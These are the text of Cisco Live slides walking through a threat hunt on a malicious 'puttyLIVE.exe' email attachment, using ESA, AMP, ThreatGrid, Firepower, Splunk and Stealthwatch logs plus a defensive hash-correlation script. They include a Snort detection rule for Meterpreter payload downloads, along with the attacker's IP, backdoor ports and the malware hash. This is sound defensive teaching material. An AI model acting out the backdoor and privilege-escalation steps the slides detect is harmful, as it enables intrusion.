Sat Jan 11 23:15:19 2020 Info: Start MID 39803 ICID 1737
Sat Jan 11 23:15:19 2020 Info: MID 39803 ICID 1737 From: <[email protected]>
Sat Jan 11 23:15:19 2020 Info: MID 39803 ICID 1737 RID 0 To: <[email protected]>
Sat Jan 11 23:15:19 2020 Info: MID 39803 ICID 1737 RID 1 To: <[email protected]>
Sat Jan 11 23:15:19 2020 Info: MID 39803 ICID 1737 RID 2 To: <[email protected]>
...
Sat Jan 11 23:15:20 2020 Info: MID 39803 Subject 'New SSH client to be used'
Sat Jan 11 23:15:21 2020 Info: MID 39803 using engine: CASE spam negative
Sat Jan 11 23:15:22 2020 Info: MID 39803 AMP file reputation verdict : UNKNOWN(File analysis pending)
Sat Jan 11 23:15:22 2020 Info: MID 39803 SHA b8fe425ad09de7664fd5391bf72d6e61bf41d8aac7ca594d4f0ff9dec2f53b38 filename puttyLIVE.exe queued for possible file analysis upload
...
Sat Jan 11 23:15:23 2020 Info: Message finished MID 39803 done
Investigation Can Be Triggered On Events - 1
Retrospective alert from Cisco ESA

From: IronPort C000V Alert <[email protected]>
To: [email protected]
Subject: Info <AMP> mail.budlab.net:AMP Retrospective Alert:puttyLIVE.exe attachment verdict changed from VERDICT UNKNOWN to MALICIOUS

The Info message is:
Retrospective verdict received for puttyLIVE.exe.
SHA256: b8fe425ad09de7664fd5391bf72d6e61bf41d8aac7ca594d4f0ff9dec2f53b38
Timestamp: 2020-01-12T00:44:35Z
Verdict: MALICIOUS
Spyname: W32.B8FE425AD0-95.SBX.TG

Total users affected: 3

----------- Affected Messages ---------------
MID : 39803
Subject : New SSH client to be used
From : [email protected]
To : [email protected],[email protected],[email protected]
File name : puttyLIVE.exe

Callouts: disposition change (in the subject line); file name and hash; three mailboxes to check
Cisco Email Security Appliance AMP log

mail.budlab.net> grep 39803 amp

Unknown file at 23:15:
Sat Jan 11 23:15:21 2020 Info: File reputation query initiating. File Name = 'puttyLIVE.exe', MID = 39803, File Size = 1425408 bytes, File Type = application

Sat Jan 11 23:15:22 2020 Info: Response received for file reputation query from Cloud. File Name = 'puttyLIVE.exe', MID = 39803, Disposition = FILE UNKNOWN, Malware = None, Analysis Score = 0, sha256 = b8fe425ad09de7664fd5391bf72d6e61bf41d8aac7ca594d4f0ff9dec2f53b38, upload_action = Recommended to send the file for analysis

Disposition has changed at 23:22:
Sat Jan 11 23:22:22 2020 Info: File analysis complete. MID: 39803, SHA256: b8fe425ad09de7664fd5391bf72d6e61bf41d8aac7ca594d4f0ff9dec2f53b38, File name: puttyLIVE.exe, Submit Timestamp: 1578780925, Update Timestamp: 1578781342, Disposition: 3, Score: 95, Analysis Id: '37a07d92b2ea9b08906f9a580df1b5e2', Details: W32.B8FE425AD0-95.SBX.TG
Advanced Malware Protection - ESA
Retrospective Verdict Updates

Callout: Disposition changed

ThreatGrid Dynamic Sandbox Analysis
Part I – Summary Of All Indicators

ThreatGrid Dynamic Sandbox Analysis
Part II – Backdoor Connections + Machine Learning Model Indicators

Indicator text: “A machine learning model has determined that one or more artifacts are likely malicious. The machine learning model is trained on a very large number of samples.”

Callout: Backdoor connections

ThreatGrid Dynamic Sandbox Analysis
Part III – Further Suspicious Indicators

Indicator text: “Some malware applications write code into areas of memory intended for data (such as a thread's stack) and then the application executes the malicious code. This could indicate the presence of code injection, into itself or a remote process.”

Indicator text: “A PE file was found with an invalid checksum. The PE Optional Header contains a field that holds a checksum. This is generated when the PE is built and should be static across the life of the executable. Malware may modify the executable, but many do not repair the checksum to account for permanent changes.”
Investigation Can Be Triggered On Events - 2
Firepower Host Profile

Callouts: possible victim IPs; IPS event details; malware event details

Malware Event Details
Information From The Integrated AMP For Endpoints (AMP4E)

Callout: APP introduced “puttyLIVE.exe”

Intrusion Events for “192.168.34.34 – client34”

Callouts: Snort rule ID (click for details); port 4444 (initial), 5555 (privileged) and 6666 (persistence); FTD detected the event

Snort Rule 44728
Attackers Will Probably Use Obfuscation

SNORT rule details

alert tcp $EXTERNAL_NET any -> $HOME_NET any (msg:"INDICATOR-COMPROMISE Meterpreter payload download attempt"; flow:to_client,established; content:"packet_call_completion_handlers"; fast_pattern:only; metadata:policy max-detect-ips drop, policy security-ips drop; classtype:trojan-activity; sid:44728; rev:3; gid:1;)
Investigation Can Be Triggered On Events - 3

Search for a specific IP

Callouts: Attacker; Victim; Ports
Raw Log In Splunk
Process Level Information From The AnyConnect Network Visibility Module (NVM)

New Search: da="192.168.77.77" 4444

Jan 11 23:59:12 127.0.0.1 Jan 11 23:59:12 splunk.budlab.net
fv="nvzFlow_v3" pr="6" sa="192.168.34.34" sp="50849" da="192.168.77.77"
dp="4444" fss="1578782333" fst="Sat Jan 11 23:38:53 2020"
fes="1578783598" fet="Sat Jan 11 23:59:58 2020"
udid="612296565E6F2BBE27230AB731334DE84D9B7CA9" liuid="''" liuat="0"
pa="client34-PC\client34" paa="client34-PC" pap="client34" puat="2"
pn="puttylive.exe"
ph="B8FE425AD09DE7664FD5391BF72D6E61BF41D8AAC7CA594D4F0FF9DEC2F53B38"
ppa="client34-PC\client34" ppuat="2" ppn="explorer.exe"
pph="6A671B92A69755DE6FD063FCBE4BA926D83B49F78C42DBAEED8CDB6BBC57576A"
ibc="419698" obc="10679" ds="''" dh="Unknown" iid="2" mnl="''" mhl="''"
liuidp="unknown"

Field legend (slide callouts): sa = source address; da = destination address; dp = destination port; pn = process name; ph = process hash; ppn = parent process name; pph = parent process hash
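Added example, not from the session or from any Cisco product: a small Python correlation that takes the MALICIOUS retrospective verdict from the ESA alert on the earlier slide and hunts for that file hash in nvzFlow records like the one above (the ESA prints the hash in lower case and NVM in upper case, so the match is case-normalised). The first record's values are copied from the slide; the second, benign record with its all-zero hash and 198.51.100.10 address is constructed.

```python
import re

# Constructed sample: the nvzFlow_v3 record from the slide (fields as shown)
# plus a made-up benign flow from the same host for contrast.
NVM_RECORDS = [
    'fv="nvzFlow_v3" pr="6" sa="192.168.34.34" sp="50849" da="192.168.77.77" '
    'dp="4444" fst="Sat Jan 11 23:38:53 2020" pa="client34-PC\\client34" '
    'paa="client34-PC" pap="client34" puat="2" pn="puttylive.exe" '
    'ph="B8FE425AD09DE7664FD5391BF72D6E61BF41D8AAC7CA594D4F0FF9DEC2F53B38" '
    'ppa="client34-PC\\client34" ppuat="2" ppn="explorer.exe" '
    'pph="6A671B92A69755DE6FD063FCBE4BA926D83B49F78C42DBAEED8CDB6BBC57576A" '
    'ibc="419698" obc="10679" ds="\'\'" dh="Unknown" iid="2"',
    # constructed benign record: placeholder hash and documentation-range IP
    'fv="nvzFlow_v3" pr="6" sa="192.168.34.34" sp="50901" da="198.51.100.10" '
    'dp="443" pa="client34-PC\\client34" paa="client34-PC" pap="client34" '
    'pn="chrome.exe" ph="' + "0" * 64 + '" ppn="explorer.exe" ds="\'\'"',
]

# Constructed: body of the ESA retrospective alert shown on the earlier slide.
ESA_ALERT = """Retrospective verdict received for puttyLIVE.exe.
SHA256: b8fe425ad09de7664fd5391bf72d6e61bf41d8aac7ca594d4f0ff9dec2f53b38
Timestamp: 2020-01-12T00:44:35Z
Verdict: MALICIOUS
Spyname: W32.B8FE425AD0-95.SBX.TG"""

KV_RE = re.compile(r'(\w+)="([^"]*)"')

def parse_nvm(record):
    """Split one nvzFlow key="value" line into a dict."""
    return dict(KV_RE.findall(record))

def malicious_hashes(alert_text):
    """Collect SHA256 IOCs from retrospective alerts whose verdict is MALICIOUS.
    The ESA prints the hash lower-case and NVM upper-case, so normalise here."""
    iocs = set()
    for block in alert_text.split("Retrospective verdict"):
        if re.search(r"^Verdict:\s*MALICIOUS\s*$", block, re.M):
            iocs.update(h.lower() for h in re.findall(r"SHA256:\s*([0-9a-fA-F]{64})", block))
    return iocs

def hunt(records, iocs):
    """Return (host, user, process, parent, dst, dport) for every flow whose
    process hash matches an IOC; all other flows are ignored."""
    hits = []
    for rec in map(parse_nvm, records):
        if rec.get("ph", "").lower() in iocs:
            hits.append((rec["paa"], rec["pap"], rec["pn"], rec["ppn"], rec["da"], rec["dp"]))
    return hits
```

The same hunt runs unchanged over an export of the Splunk search results, one nvzFlow line per record.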
Pivot From Splunk Console To Threat Response
With Browser Plugin

Callout: right click on the hash (the ph= value of the nvzFlow record) in the Splunk raw log
Callout: “Show me that nice relation graph!”
Cisco Threat Response
Details For „puttylive.com”

Labels on the relation graph: Created by; Cmd shell; Parent process, executed by; File name; Network connection; Email subject; Target system; Notepad launched; Spoofed email; Smtp src?; Victims
Adding One More Element To The Investigation
Triggered IPS Rules and Stealthwatch Alarms Revealed

Snort Rules
Callouts: “ICMP too large, exfiltration?”; “Added to the investigation”

Pivot to Stealthwatch
Stealthwatch Alarm

Stealthwatch Host Report

• Clients Acting As Server
• DNS Server Among Clients
• Link Local Multicast Name Resolution

Callout: Flow details
Investigation Can Be Triggered On Events - 4
Events for “client34” in AMP For Endpoints
Callout: process level relations

Device Trajectory in AMP 4 Endpoint
Process Relations
Callout: initial backdoor connection

Continue with Device Trajectory…
Callout: UAC bypass, priv escalation

Continue with Device Trajectory…
Callout: elevated session
Summary

• Security is all about architecture. It’s the seamless cooperation of point products.
• With proper integration you can automate tasks and prevent the easy attacks.
• But you still need a human to do the investigation.
• The „detect and forget” approach does NOT work! If your security system detects something, be curious, ask why it happened, and investigate it!
Closing – Wrap Up
Thank you!!!

• Thank you very much for your attendance and interaction

• Speakers

• Bart Van Hoecke (HW/SW, Identity & TrustSec)

• Gyorgy Acs (REST API, TLS Decryption, RAVPN)

• Sven Kutzer (CDO, FDM, Migration, Backup and Restore, AMP, Threat Hunting Part I)

• Szilard Csordas (A Day in a Life of a Packet, Threat Hunting Part II)

• Dragan Novakovic (Deployment, AVC & IPS, Security Intelligence, UI Improvements)

Related Sessions (For Your Reference)

Breakout sessions

• BRKSEC-3328, Firepower NGFW Management: Making Firepower Management Center (FMC) Do More
• BRKSEC-2020, Firepower NGFW in the DC and Enterprise - Deployment Tips and New Features
• BRKSEC-3300, Advanced IPS Deployment with Firepower NGFW
• BRKSEC-3032, Firepower NGFW Clustering Deep Dive
• BRKSEC-3035, Firepower Platforms Deep Dive
• BRKSEC-3093, ARM yourself using NGFWv and ASAv (Azure)
• BRKSEC-3455, Dissecting Firepower NGFW: Architecture and Troubleshooting
• BRKSEC-3063, Decrypting the Internet with Firepower!
• BRKSEC-2382, Application and User-centric Protection with Duo Security
• BRKSEC-2494, Maximizing Threat Efficacy and Optimizing Performance of Firepower Threat Defense (FTD)
Related Sessions (For Your Reference)

PSO, Instructor Led Labs and Walk in Labs

• LTRSEC-3001, Deep Dive Lab on ASA, FTD, and Firepower in ACI
• LTRSEC-3052, Deploy NGFWv & ASAv in Public Cloud (AWS & Azure)
• LTRSEC-3460, Firepower Data-Path troubleshooting (A practical hands on lab)
• LABSEC-4490, Firepower v6.5 and DUO Integration : Configuring and Troubleshooting DUO for Cisco AnyConnect VPN with Firepower Device Manager (FDM)
• PSOSEC-4905, The Future of the Firewall
SBG’s User Experience (UX) team is running collaborative Design Thinking Sessions at Cisco Live!

Your ideas → Sharpies + Inner Picasso → Product Improvements!

Do you:
• use our NextGen Firewall product(s)?
• wonder who you can bring your experience pain points to?
• have ideas that keep you up at night?
• want to improve product experience for yourself?

Come talk to the Security User Experience (UX) Team!!

QR code 1: Come join our Design Thinking session on Tuesday or Thursday! Sign up using QR code 1 (above).
QR code 2: Don’t have time at Cisco Live? Join our UX participant database and we’ll be in touch to showcase upcoming features and get your feedback! Sign up using QR code 2.
Complete your online session survey

• Please complete your session survey after each session. Your feedback is very important.
• Complete a minimum of 4 session surveys and the Overall Conference survey (starting on Thursday) to receive your Cisco Live t-shirt.
• All surveys can be taken in the Cisco Events Mobile App or by logging in to the Content Catalog on ciscolive.com/emea.

Cisco Live sessions will be available for viewing on demand after the event at ciscolive.com.
Continue your education

• Demos in the Cisco Showcase
• Walk-In Labs
• Meet the Engineer 1:1 meetings
• Related sessions
Thank you
